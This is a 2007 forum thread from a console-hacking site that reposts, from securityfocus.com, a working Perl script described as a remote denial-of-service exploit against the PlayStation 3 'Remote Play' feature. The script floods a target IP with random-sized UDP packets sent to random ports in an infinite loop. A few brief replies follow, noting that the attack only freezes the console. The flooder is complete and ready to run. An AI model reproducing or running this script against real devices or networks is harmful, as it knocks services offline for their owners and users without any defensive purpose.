xboxscene.org forums

PlayStation3 Forums => PS3 Hacking Forums => General Technical Hacking Discussion => Topic started by: PS3Scene on March 26, 2007, 04:17:00 PM

Title: Playstation 3 'Remote Play' Remote DoS Exploit
Post by: PS3Scene on March 26, 2007, 04:17:00 PM
Playstation 3 'Remote Play' Remote DoS Exploit
Posted by XanTium | 26-3-2007 16:41 EST

 
From securityfocus.com:
Quote

#!/usr/bin/perl

####.:Playstation 3 "Remote Play" Remote DoS Exploit:.####
#
# A UDP flood while the "remote play" feature is active
# will result in a denial of service condition.
#
# Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A
#
# -Dark_K
#
# POC code is based on odix's perl udp flooder
##########################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=1) {
printf "usage: ./ps3rpdos.pl \n";
exit(1);
}

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ARGV[0]");

printf "Sending...\n";

for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

News-Source: securityfocus.com

Title: Playstation 3 'Remote Play' Remote DoS Exploit
Post by: ConteZero76 on March 26, 2007, 04:55:00 PM
Remote DoS exploit only means that you can make a console not responding.
Nothing more.
Title: Playstation 3 'Remote Play' Remote DoS Exploit
Post by: lando786 on March 26, 2007, 07:05:00 PM
ohh guess that sucks sleeping.gif
Title: Playstation 3 'Remote Play' Remote DoS Exploit
Post by: zerosignal0 on April 20, 2007, 01:20:00 PM
short and sweet perl sploit! Too bad no one knows what the hell a perl script even is on this site.